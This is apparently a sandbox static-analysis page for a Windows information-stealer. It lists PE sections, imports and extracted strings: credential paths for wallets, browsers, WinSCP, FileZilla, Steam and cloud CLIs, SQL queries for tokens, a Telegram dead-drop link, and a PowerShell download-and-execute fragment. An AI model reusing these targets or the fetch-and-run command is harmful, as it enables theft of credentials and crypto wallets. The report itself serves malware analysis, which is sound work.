Static | ZeroBOX

PE Compile Time

2024-04-23 23:24:05

PE Imphash

554d949fd335dd5958de0342706fbbec

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00022393 0x00022400 6.37533277228
.rdata 0x00024000 0x0000b124 0x0000b200 5.52326638016
.data 0x00030000 0x00212ec0 0x00001000 3.83587298337
.rsrc 0x00243000 0x000000b0 0x00000200 4.10652364328
.reloc 0x00244000 0x00005252 0x00005400 4.76263783803

Resources

Name Offset Size Language Sub-language File type
RT_MANIFEST 0x00243058 0x00000056 LANG_ENGLISH SUBLANG_ENGLISH_US ASCII text, with CRLF line terminators

Imports

Library msvcrt.dll:
0x424108 strlen
0x42410c __CxxFrameHandler3
0x424110 memcmp
0x424114 strcmp
0x424118 ??_U@YAPAXI@Z
0x42411c strncpy
0x424120 malloc
0x424124 _wtoi64
0x424128 atexit
0x42412c ??_V@YAXPAX@Z
0x424130 memmove
0x424134 memchr
0x424138 strtok_s
0x42413c strcpy_s
0x424140 strchr
0x424144 memcpy
0x424148 memset
Library KERNEL32.dll:
0x424014 ExitProcess
0x424018 GetCurrentProcess
0x42401c LocalAlloc
0x424020 ReadProcessMemory
0x424024 VirtualQueryEx
0x424028 OpenProcess
0x424030 CloseHandle
0x424034 CreateDirectoryA
0x424038 WaitForSingleObject
0x42403c CreateThread
0x424040 GetDriveTypeA
0x424048 GetProcAddress
0x42404c LoadLibraryA
0x424050 HeapAlloc
0x424054 HeapFree
0x424058 LoadLibraryW
0x42405c GetStringTypeW
0x424060 MultiByteToWideChar
0x424064 LCMapStringW
0x424068 WideCharToMultiByte
0x42406c GetModuleFileNameW
0x424070 GetStdHandle
0x424074 WriteFile
0x424078 Sleep
0x42407c RaiseException
0x424080 EncodePointer
0x424084 GetLastError
0x424088 DecodePointer
0x424094 IsDebuggerPresent
0x424098 TerminateProcess
0x4240a8 RtlUnwind
0x4240ac GetCPInfo
0x4240b8 GetACP
0x4240bc GetOEMCP
0x4240c0 IsValidCodePage
0x4240c4 TlsGetValue
0x4240c8 TlsSetValue
0x4240cc GetModuleHandleW
0x4240d0 SetLastError
0x4240d4 GetCurrentThreadId
Library USER32.dll:
0x424100 CharToOemA
Library ADVAPI32.dll:
0x424000 RegOpenKeyExA
0x424004 RegGetValueA
Library SHELL32.dll:
0x4240f0 SHFileOperationA
Library ole32.dll:
0x424154 CoInitializeEx
0x424158 CoSetProxyBlanket
0x42415c CoCreateInstance
Library OLEAUT32.dll:
0x4240dc VariantInit
0x4240e0 SysAllocString
0x4240e4 SysFreeString
0x4240e8 VariantClear
Library SHLWAPI.dll:
0x4240f8 None

!This program cannot be run in DOS mode.
#Richs
`.rdata
@.data
@.reloc
SVWh0CB
j h@LB
j=hhYB
j_h`\B
HjMhh^B
j%hh_B
j3h(cB
jWhXjB
j&h oB
j&hHpB
f9NXu\
f;VFs0
Vf;OFsB
Vf;OFsu
Sj h$zB
Sj QSSWR
`ShvzB
`ShzzB
`Sh~zB
uf9EDta
SVh?{B
t5hJ{B
PSVWhfzB
RVVVVVV
QVj hP
RVVVVVV
ExRQVW
URPQQh
^SSSSS
;t$,v-
UQPXY]Y[
t"SS9] u
<+t"<-t
+t HHt
PPPPPPPP
PPPPPPPP
@wallet_path
SOFTWARE\monero-project\monero-core
\Monero\wallet.keys
G4O58ELSUJLWKCX
H3D9FNWAVWV1XK
V0i4!4
23$T+8
06ED8QQ4N18H
|Y$ t83F/CA
OK0Y6K0N
#8D+U*D
BDR4B9U33I
NNYH4MGSLVHM
QLA79MK60LA
C86XAENVTGPOSN8EGYXG
1!1:?:t$)>
3DAHT6SCMO7H76QMYU
e-3<!W?
!#X+rN844
LL8PN265OMM
%J$;SZs=((
5DV9IQ88ZDDVL
r!"j0"L]7
JFJHQV7VPWML
/8<$7[
HO0HKXSGZ
QKMIZPRO9QHZWGIT
5=":M4:
ZP2O1QRI
6#F=R!+
XACI0OQVPV2469
B 23#%zQWI
1GQHPFEWVHRYVHZ28
%4728<
+9+?AK
A3DUYMJY
-@0'5($
V9WKANOWZYW
< 4?*$
8UALDBP50B2I6XW1B2OC
P]-@0e,6E7A
3GS4FSMU4CB5T
t"'g? 90Y
C3OARATIRSW210WOWN4L
V21BFGVZ5BYA
7VG#6.eh
7Z33I1T24
4MY6BO2ZGH
A><Dq}
ZHU8KCN5LP4
9:,H?p|
NQ4W5C63F
%P;YmR_*
43BQ1QCED129
Y382M0S04
6INAQ54KGL56A
N5GDH39I1
P+!)@\
TW5YX53SLOCK8VYQKVI4
%L),fG!%!$W
0?*$0u
7P7CYQ
D#T"77
CWJTZ1WEY1F1
I8QYAR
4ZOKSW6
I0O4DZ2
AH2HI1YKY46
d GglY,d|\C
6LSMKOIPPI8B2EWXQAIKUBM
%9 "?'U'\1
9#(()9'
1AFIPI2TBTNVLN5Q9V
6 <?.;A4J
YJTBFADWEH
KQUM580M
44=sJU(
EF3GWY7RPTL
JVTIY62305
:;+8ZaZJP
FE3DVJU9BZMXTL31RX5DXUUK
V-6%=8<
6T4+=:?
5W0I5QCFAQ9AAD
|$g&Bgw
3>Z$27
BPNSO38WBIO6O
"!0*@Kdp
F7WHUUSI8SLE
:62%l:!
VWHWCL31OVQ
%QC.$(
0FG1MJVS48B7HNIPQS4D6B
w#3e$'3
[V'~&(&"<2@-Y,
N2G0986VF9TR6CN3F9NA
W3c@KB3+i;%S1
RFTZ9J36MJUSTY1NUVJWW
;5;+\/!?%9
J3BO0RGBWM5Z6TIJR00E
Y<#- >q3D1*>=BI
9I6PB7HL9ITZ0N
i;Y3'D;
ILSLJ1X506Z2XF
SED5TSXA7VM2J5BO2F9SL61F
0`'6*
R0,G&A
Q8RES90IKC25EYFI0H
O68RR23MDT2
ST7&Wu$(1s
E4VN7OVBSS74D
]8*y*.6
RHDGJE912
DS4H9QYKG
:Z,z=68"
6HQGIGSHKUGHYQB49KYXC9T
'1::$;*-7%
UK"8:/\
BL0DS0OEMI
#S%?q#)"*
MBXXL96YC3PUU
OC3NAGAX
D7XO4RD9Q5Q49M
]>!i>\?@\?
OOGXK29AF
=.,.tP-#
EQ1LAZNO7MU
JE9IRR3YV880VC
;A*"~Q\3
XPGM5HYC2
?74s!5&s
T8DFCKDRSSOCKO
Q626*(
!<;&(;
8G28KPHF0FJNKGBCE6HMQKOM1ORQQHG9
"Ft$7!%Q*
<$$'06Y:
?- ?\.&8>&
NAHGCJNWVNH7
6Y96PQNR5
Z*MD3!7<t
77X2QG680ZS9J9J8594
<n#]/{]XF
TU1DCRPCOU
A93YEPCUOWDRY4XZ7WZ
07URT8KG4VL
w[:05T
ADSNZ0YKFUH
B6(#&;
ORN1C66QNT3NYWQS
7<\*XW%+
A!:2"
K03II8CV98KE6AXRETS
<J13WL
7Y"=!6
CE15OJOH1H0
$!XE#?<fU$\
40JIOTLL8
[\/z}z( T
PO22DV2TN5
2,@K4"
LIEDNOT4P93
; +- *
1LNIEU5YWDF
B$">$%\w3(*
3UDYL822R44
66SZW545Y
6MFYDPU8B751
D>2+0=2JlSY]
1FOUAZCUCWR86OQ0P7940P
r4*45?
:.'3L_-=U
JRPOU6O41U9D
E0DEVF
1KWK4G1Y83SE
u.;.@"~;RV01
7AAM67FWEFFI4793KZ
t3$,BR
8(6'=]UUV
XKL3CQ28XIW68ULXX8C14G99
4Fq5(0S};/7<]1Bg.C\
AWFOP6H8OIGH2D8UU7J6
S<q"( -w*[:1R8E
9IHU6HKA0S5RLM2QKOS0BYS0OD4
~-!%u:. D6w;8 S!
TASH76D92PURIW
%:8[C7jF1'&<'
HH5MZ6QKSJFOS4L
,\=6C"
;?2+<C"
0RG3M0AHK8UHMAA06JE4Q
.cB8 U<
WNYGOJRJBSNIXB8O
#!:- +
Y65G9UOF
ZDKRTJEOA4DDRW7RS8JQ
6=:d&!]+<
G9Y8CLHMIXRC8TRK9902N
9;=3.w:
9H3846C9OYAL88
z'fV]X*M&8-%B]
ZPLPHC1FMNBF
>!7X'!'8#
8EXSSIQCH15AIPFN
_F5(>%+
48Q0AV25XUSZV45P6Z77M5G245
v{#I1"uP60!;"Qf)[7RC?\$yQL
07TLH26OKO6KFNM15701QN6PDTRI
rt&58Fu#$<S
*)"C\CX\
<Y&-07;
B92Y5E44LMN03
z@ E1pQ/?7@G
HTQTVTUUUAICDPMBE
;,45?6<
HYKYMLVIPBSSQSUA
,#6!<(
8J4P6R96YQ8TW2YR3HEZPE4I5KG
F)F&vF<?y80]+;G (
"*B Q.5
SCBERYCFGSVH0
YOA6MBWWMAZJO5U3
*5r(1<#"1
Q3WMR5TXS9H
_8>7b=67V?
9NAAE863X
N=13,VBU
UGCM4D2RL17BVPIUOT4
)6 p-A" PN
3& 6*'u
FC93BRKA5UZQZ080K1JRO
&Mx'+).T'>
;IWE?}#!;
DCL1BGN71Q
0OBXVUMB4
G<2*?;9$c
UC77WLHKXZ83EBQC
&Pf"):2
9YC9L6CDD9BYC
k<$|"C.
NF7ZP6MGFYQ35
ZI3WVMUVV6K
BTY933XJTHKUA
1>|]F5
DYEE639WFPG4JQNYDR1I
+<5BqP9'">`%
WX6IMMMBGKYPX3T7HQ
#25$-5;G
Z17Y6DREUMJVQ0SL
OP251UR7P511GQ7
*R3@ET
QQW1AL7121H192V3
?#T3"RE}A-_l@:r
76LODELYEJAIAM07
~X8*6+)-
%/'$.Dv
EP2E48SAQYAET2RE4C4
>F FV65
5.61z3+P/Q
44B3ME7X0LY0Q
}Z6V?+R,
BKXU9Q98OL8PEHEM
?,%j4W\
)I% ;1
25O8S5CCVQ96L1Z1
4HC)B.p
7UDJF6FOD5PTDOH7
~;0/4X#;
2K8PK27FHV9SQCWXV
{%L59\R2
GSTE5H5Z
95WQT9G
ICDA3JQF
W7CT7W7AI2766Y
V7<z6C"!aGSU
27DD0L6LZYW2JO9V4L0M
_(C ?>^/
7H2X8DC5NYVCKU
e%a,Y67f+*%*$;
JG7ZTFJLIO7EMTBX7WF
*e?3/98,=e >;7*T25
T0VEQFXIB
7ACTSZE2YE2V
A*,]8
DW8OZ30T4009
7&T&.V
704YBQU66HNHLOWXOI
DAX064fiF:+8-=2
833UQEX01L6Z
KB_<% koB8S*
GGKDW15Q1IT5Y5I0CKH
46'-#T
R&8@4[
CEV26FMKZBLZJ9GB
04:[B#~
<+";&P='
H7I2428R0K76U
;F%[@W
66XQE3VVON7JRFOPSJ5R
EG481Ve
,![??(
4B34SMKFEBWHQZ3FYIF
G3_]'(x
&-;=<4l$5&$
FVP2TKSNWTBHA
#83@-;'+3
C281TQQM1031MJ1JEZ6OIKU
da&>6?P]wP9+m$6)
99XVD4VF
B97C6KOWE9P1
e#:#!V'_
TZWKKK75MRLW2H9165NSFU1
<82@&X]}P7
1OH590D2P3SAJ
fv6W5`?.>
NNL36Z3TYLJYLW0JV
F 1)$-%4Q>3
6V9745CO8FIZ53K
|#*(LC?
HZOTUUVQ1HCD7GX
':1#P%
ENS466BMSRIO8UU43S9RWHGYBLFIZ11FHLB5GB6OFN6BLGX6GNJV7ZB6G32V0
qubb"!;.&V
'$-57#!#
,P]3-`bE&1E8)<R
:&4C"n
bZ(T[8C
2W0ZDG
a8V.~g
XSZX1VVLJ
(!5>X:3vj
LFN5XJ
BMRGHRJ
"5.&hj
EYMILXN0FL
8>:;7<T|l
ZS9MO1V
BQ77Q0K
4C@>B
IT5YNOA
;Z2'*2
7SF3E5X6VW9G5DRSX5KNGWQ62MLX9QP9ZOQJQILCKUFYJNAV55NOI60LCIA2TA6EHAQQWICPUIDWQ2XPL01ECA03XFHHHTSJXARI6U8W284A2E5KVVQ3
/#%F]# !
q X.'}j8:
0.63+/ba~PM>&;SC
uxqaxzxrfa}poa
=(+:1$'/<
$(Z ]wTJ[,
&Z$=?4@
4HAZ48PL
u=55RQ<
OS11ELDF0BTJ7WVDYB58K8K1RV704K8G
d(Q/1f
3#C_R"T+
Q8GDYCD
Q4061=
Q8BTVJHEIV7B2CQAPIAKTNMKQDM38QS
a%;-8t
7O9IPYRJRZF7JFD9704X2UDV0CS6OG2DSO5YR2ATTABYHNH7J4AZY04MLORMGU5L6CP4KOSF0KE1SONN5UXUGCP1TSNCKXN
r$37#h%(
0<&Y12B&(\
a1,1++):!X$k8?8B
;@!T&"k.!04I;1T7o
x65&4X
8F01F8
MX4M48N
WC37AE
RV7LE4
XXK1BP5
7$Z+5F
D7FW1WIPS7
2HLDBFRY
QCGF1B4
*42^0M
V7SKB53695P
:X4",F
QQCK2Y8YED30V
7>1&a,Z4,0fb
S3CVNZ7FD2GYZ
&@&$ ;Z#
FRB9LMIVYAWFKRHD7
#<!K5==3=
$#9<))R
02H71H3HTJ8KNX5WC
U\+EH8G-0
Y8=/Z%'
2QR942QQDI0CGBNQ2NJI11CJLLN0TH7ZQ28LZ87OM1QBHIGWSFJGIPNAOHXSPZ75KAVOCB14P45AK
|wfq9+:Dog+=
_]:fl</D<d
3"a]//JRcmT)2!;>{s(+*,|n7.$-6p
R[?_\$8
ACDE0IN71RBO87RKO9X4V1HW2TQOP0NTNZNFUOYRT7ST
nQX7.+VV?.c
.U:D-wt
<!48'0! X!-
U9EEJUB5IFZJ4QMH19SAERBIUL0AKFKXIYC2O
5>#*0?
ME5ZSLHADKDCR0
.*Z1:);o7:(*&U
UPSOC76T73AUC4BAGO
3?!"+^E XA8{0E.(3*
T2O4WLVF4HQAW
$^.W2?x5E$852
82P0I0J
h^%W ^9
94S3HBY7JM8DEZSZLZ2G36DY
u[0R$b
O>(V7,5=z?F3ZX#*
D6HC2WD3K7PYKVXVWY6SJN6
<G.Y#0$8x
2-B:$)E
7PDEBPTQC
~> :50
13ZK3WFWIF2G
~C?9Rw
J4OZCHTEAVPZ9KX
YSCN0RN
7Q5M1ATJJEU0XVYO9
T9G"\$y/210^+?6!f
I9LBFOALT8QEF1CZ6783
b+(+$41\5'h]&,S[\Q
ZPTV0LLEJWC
?77\l1+#&
9DDE0FL1C5BH
I6+#Y*)Bm\,!
BCFDMS
!+4+ 6
J2Q0L3C
,[#U*\;
5B66QAC
b#ZZ450
WLTVF68YIRSUH
9WI5OJS3MJP979A9KFWEBZGRFS4WUU9I0WDI3BSHSIKC
9ZEV2V-2
+4#=1
z<B%!'G
6: $-
DVI78Z7L6QG
$&SM9C
5I2JHJL51FJXOW2OE
NTK7Y5WYLKP43CKW2WAS26M6BHTYYR3O4LMGVSHNFV586B
ne4E6-9
7];F-!
$<++5%ZJjr
7D8AW926MRHN5QM894Q
g6W"2JAY?
A9R0EBKPWMGANAAJQZY54W8849IW0BHWBS5BQM49MUFTGR3M4H6
."<.2%7.
b]9\WCJ
E0:2,'c'#>]V#
:.<@9U$Z
IK9VOBS5E3X
"J&##*{$^=
YVFT95F93D5ZTK
?5$UT?oV6F3;%
QO2NG51SE9L
7=W+%Y
B6Q97RZFY5T
/Y+^['?h=Y8
OWR7H5O2MVQL
7X0R875F
QGH79Y95WGT4
"(.CV2W
O69G6IX6EMW0VUTM
9UK2X=1[ |c
H90H2Z
AXTVZK9BE
n;t%.*K6e
TRLPFWYWP
LBY311LKE
9WFPXAXSZXOA72
Y8Y6ISOK3U00T
HH52JPFAP8D
4L1X6BIPNJA4C4
D20Z2VZ7QPK44EV22
JAVC610N
WOKWMO65L
+"$. DQ
MCHD3VQ14R2GA9LAJNTFI8B788NRWX
''R:qb@=@&&\
-/81*-Z
GFBQOLUIR14QRKF9WP9WDA
&^F05.
U2&\; #
NZDNBKF4H8EHLWFUUA
!"',4U%
-?<2:%
PA62L2R01
;$Om(S&QB
8M7SATG2MNBJKCWU5
4B48GCEVOL6KSHSJP
EXF43HT0F7JHPQG0I
DLDU3RBH7CF925EKP
HX4YB3LH
=X<%A-%
KFDW5FN1
'7$B)<U
NCE79JT6UBR1M3MG49HPPS27DU6R0CGY7PXC0P8VGXZBZOSR371688M4KH4PMCFS5237FKPPAWJ130HYBOX3KK09D32SVTIDSHG7VVMSRM5MYUATAFO7OMHUC44
QENIAJ0G
,#CN+&S
;R?\>(RM
9=VX3&
,E"=-D
]$415,
:<WXFE
u(G8)S9#$f
@P@N5?5=
8^UY$<1
F?'_V/o
eg|b6~wua
qdpv{u}
au~yqz
LR64RNGJWTKDQCEL7OOKS2ISPEKYF9V401AAVSO8SLO90C85JAKGYTLTJNOMDRDX8PMYCD0OAP2HOI2NGPPFYPFGP
021FTRSH
=P@%/5/
"'#,6#Q;
{EE-.98
h!#)P\&Ki
4?+6;'
a~hruT|
R1HDC5BH0BKZJ3FK5GI1EFAVBFXC88TJFJUMTK8U09XHSY7VJ52J7PKM1VC6H8I1SAT9I30UHXAER3CMIC3DGKM08
YOANWV8I
^.04T0-l
"98\5$S3
~# (5'
3>9"; d
BV>!?<D
@F&X?
IV7IBN115ZSF7NPEIBJOG48T0YFFFVHX2B9I3MGKINVDUHKYN87JDL2OWOSNIWVKR4M6NHK548F2I48SOQ2GY8U
9Q=5/CTi
:%E!#*/6
!RQ7UThv
=,^-V"o
5$/':!&
,:TX%/
QIVVP42CW2LW04NKGYBOEG9F2Q9913OVSJ6X2V5BB6TA7IHYAGVSWUQKJP3943L3NZDR8ZSV2AMIX8IUIL8VI59
&0"'U@&
%4B[=$!-
#!P%W_
m|:"?%Y3n
G-$_8$D
,5+9<<
}kuc\i
72VOM26GIU0XHEZZKXAZVIIXLHI0T4ZURZGZMLF363EX7LAPSVX7HGOZU8DETFWN5FFR8AN9SH31EV0AG2H8G2NLL
D808YGC2
d]0;:SD"
Y;:*)5-,
?'-7;;i}1G)453)=m3QEJ6,R!
!9>^$"<
qspzyq
4FR591S7CUN384XLZ0SNM
'AU^<\4-PWA68)
8Z5GFE
h3Q /+
CT2SUZ9LN
zB&'*U)
AWI66DKBHFKI
4*YC*?1f>&%
KOI8XZP6QVZ
4WQNJC3
@8:+$y
D8TKKDSVRJXYYA561ETU
W2?<%!3
95/$ieE 58
6AUP7O6NK
e501ZW:#
QZA8OBLZ
9.V)++
HFI27Y90YJ
+)'T^>
0S6DNEM6GELAUWZJ
t:W(!"
Y)#%&{!>,
8TH0AOE42OGERHOU1QKQR87U
|=)\.(
>*']02{|NS3
XH8L0HVVDX0PS7ILNC
4!Z>Q:/0+4T5!Dg:*%
L97IP9Z1IEMI2A
VP >L)T;6c?V'
VWD2P2E
U3UB3R9B4H8
&B9+G7
CPW8WP29
!"8O$5@J
364P5U80FNGVR00O6NF
or]#V:JT
:(=7^CaB62
NOW9XAQHFWMKH82FF91DRR63JJHR5
a,wM1,4'3#md<
ITU6YRKH6GPPN3D3C9WZVUOEJX6S30O28L6C1N
A+T1X:
SQR7J3MYEX29GJU2KXFPWBV2OF2
`#])62+nJ>9!W&kt
BZRFHXLV2VTI03UEHFBI7L0R5ZTDBZHB117R2PVXMTXARNCU
5<2-68{f/$,
80$2+9V>D}S5&)o>)6P
0]%8<,&!|
BYC08AKR
DHUCORR85CM2UN6OXZ9RX9SNL7ACYHT2EDTE9V
';7*<&
q*>B:=_;15Whx_<<!
A34EZG1RR
TXQ32PC
9="@S7&
D9UTJACZHNL9FL1LIPO24FSS2B818J39JAEA
IK4ZEBJDDKSI1M
:(F? ,9,+?}#A*
The Near-Earth Object Confirmation Page (NEOCP) is a web service listing recently-submitted observations of objects that may be near-Earth objects (NEOs).
Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004.
3a0d6ef1ba365424eb0cabf120891041
At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.
Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004.
nve7n2
https://t.me/snsb82
At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.
Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004.
nve7n2
sqln.dll
At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.
Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004.
sqln.dll
At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.
https://steamcommunity.com/profiles/76561199677575543
Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
sqlite3.dll
sqlite3.dll
------
------
------
build_id
------
------
------
build_id
------
------
file_data
------
------
------
build_id
------
passwords.txt
Downloads
Downloads
SELECT target_path, tab_url from downloads
GoogleAccounts
GoogleAccounts
SELECT service, encrypted_token FROM token_service
AccountId
Opera GX
Preferences
\BraveWallet\Preferences
Google Chrome
passwords.txt
Opera GX
Opera Crypto
Opera GX
0123456789ABCDEF
Software\Martin Prikryl\WinSCP 2\Configuration
UseMasterPassword
Security
Software\Martin Prikryl\WinSCP 2\Sessions
Soft: WinSCP
Host:
HostName
PortNumber
Login:
UserName
Password
Password:
passwords.txt
\AppData\Roaming\FileZilla\recentservers.xml
<Host>
<Port>
<User>
<Pass encoding="base64">
Soft: FileZilla
Host:
Login:
Password:
passwords.txt
Stable\
Stable\
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.
65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
N0ZWFt
steam.exe
invalid string position
string too long
Windows 11
CurrentBuildNumber
SOFTWARE\Microsoft\Cryptography
MachineGuid
Unknown
%d/%d/%d %d:%d:%d
Unknown
Unknown
Unknown
Unknown
Version:
Date:
MachineID:
GUID:
HWID:
Path:
Work Dir: In memory
Windows:
Install Date:
Computer Name:
User Name:
Display Resolution:
Keyboard Languages:
Local Time:
TimeZone:
[Hardware]
Processor:
Cores:
Threads:
VideoCard:
[Processes]
[Software]
information.txt
C:\ProgramData\
Invoke-Expression (Invoke-WebRequest -Uri "
" -UseBasicParsing).Content
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\ProgramData\
%s\*.*
%s\%s\%s
*%DRIVE_FIXED%*
*%DRIVE_REMOVABLE%*
%DRIVE_REMOVABLE%
%DRIVE_FIXED%
\.azure\
Azure\.azure
\.aws\
Azure\.aws
\.IdentityService\
Azure\.IdentityService
msal.cache
Soft\Steam\steam_tokens.txt
kernel32.dll
NtQueryInformationProcess
dbghelp.dll
HttpQueryInfoA
InternetSetOptionA
SymMatchString
ZG:XA
ZG:c=
Unknown exception
Complete Object Locator'
Class Hierarchy Descriptor'
Base Class Array'
Base Class Descriptor at (
Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
delete[]
new[]
`local vftable constructor closure'
`local vftable'
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
delete
__unaligned
__restrict
__ptr64
__eabi
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
CorExitProcess
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
1#QNAN
1#SNAN
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
memset
memcmp
strcmp
__CxxFrameHandler3
strlen
??_U@YAPAXI@Z
memcpy
strchr
strcpy_s
strtok_s
memchr
memmove
??_V@YAXPAX@Z
atexit
_wtoi64
malloc
strncpy
msvcrt.dll
ExitProcess
GetCurrentProcess
LocalAlloc
ReadProcessMemory
VirtualQueryEx
OpenProcess
FileTimeToSystemTime
CloseHandle
CreateDirectoryA
WaitForSingleObject
CreateThread
GetDriveTypeA
GetLogicalDriveStringsA
GetProcAddress
LoadLibraryA
KERNEL32.dll
CharToOemA
USER32.dll
RegGetValueA
RegOpenKeyExA
GetCurrentHwProfileA
ADVAPI32.dll
SHFileOperationA
SHELL32.dll
CoCreateInstance
CoSetProxyBlanket
CoInitializeSecurity
CoInitializeEx
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
RaiseException
EncodePointer
GetLastError
HeapFree
DecodePointer
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
TerminateProcess
InitializeCriticalSectionAndSpinCount
LeaveCriticalSection
EnterCriticalSection
RtlUnwind
GetCPInfo
InterlockedIncrement
InterlockedDecrement
GetACP
GetOEMCP
IsValidCodePage
TlsGetValue
TlsSetValue
GetModuleHandleW
SetLastError
GetCurrentThreadId
WriteFile
GetStdHandle
GetModuleFileNameW
WideCharToMultiByte
LCMapStringW
MultiByteToWideChar
GetStringTypeW
LoadLibraryW
HeapAlloc
IsProcessorFeaturePresent
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVtype_info@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
2"262<3c3
::8:e:
>$>2>?>M>Z>_>m>
V0U1^1f1l1v1
1:2q2x2
343F3\3f3p3z3
8&8+808<8A8F8U8Z8_8k8p8u8
9#9(94999>9J9O9T9c9h9m9y9~9
: :,:1:6:B:G:L:X:]:b:q:v:{:
;$;);.;;;c;h;t;y;~;
<'<,<1<=<B<G<S<X<]<l<q<v<
==$=)=5=:=?=K=P=U=a=f=k=z=
>!>->2>7>C>H>M>Y>^>c>o>t>y>
?%?*?/?;?@?E?Q?V?[?g?l?q?{?
0"0'03080=0I0N0S0_0d0i0u0z0
1+10151A1F1K1W1\1a1m1r1w1
2 2%2*292>2C2O2T2Y2e2j2o2{2
3"3.33383G3L3Q3]3b3g3s3x3}3
4&4+404<4A4F4U4Z4_4k4p4u4
5#5(54595>5J5O5T5c5h5m5y5~5
6 6,61666B6G6L6X6]6b6q6v6{6
7$7)7.7:7?7D7P7U7Z7f7k7p7
8!8&82878<8H8M8R8^8c8h8t8y8~8
9*9/949@9E9J9V9[9`9l9q9v9
:":':,:8:=:B:N:S:X:d:i:n:z:
;!;0;5;:;F;K;P;\;a;f;r;w;|;
<%<*</<><C<H<T<Y<^<j<o<t<
="='=3=8===L=Q=V=b=g=l=x=}=
>>+>0>5>A>F>K>Z>_>d>p>u>z>
?#?(?-?9?>?C?O?T?Y?h?m?r?~?
0 0%01060;0G0L0Q0]0b0g0v0{0
1)1.131?1D1I1U1Z1_1i1p1u1
2!2&2+272<2A2M2R2W2c2h2m2y2~2
3#3/34393E3J3O3[3`3e3q3v3{3
5#545\5b5|5
7>7G7m7r7
9<:U:f:}:
<(<S<{<
30I0O0t0
616T6e6
6-767E7P7W7a738V8
979P9p9
;A;L;j;v;
=#=4=\=b=|=
?8?F?m?r?
2D3U3`3g3x3
3P4[4h4r4
>+>F>y>
>9?H?_?n?
000Q0\0j0o0v0
2F2b2r2
4(4.454B4H4Q4Z4c4l4u4
55,595
7F8W8i8
9(9D9U9m9u9
::&:9:A:H:[:c:j:}:
:B;X;g;
>.>@>P>f>
2.2@2P2g2{2
4E4S4{4
828M8i8
:7:S:e:
<;<U<e<
P0j0q0
1&1-1g1
4$4)4/464F4K4Q4f4
4 5d5{5
6!6(6;6C6J6O6Z6e6m6t6z6
7#7*72797?7J7^7p7
7F8`8t8
9::K:]:t:{:
;/;K;\;q;z;
<'</<6<I<Q<X<k<s<z<
=F>]>q>
?"?I?q?
020L0h0
0A1\1p1
2I3N3\3r3
394J4\4l4
617>7K7X7e7
8U9c9T:c:
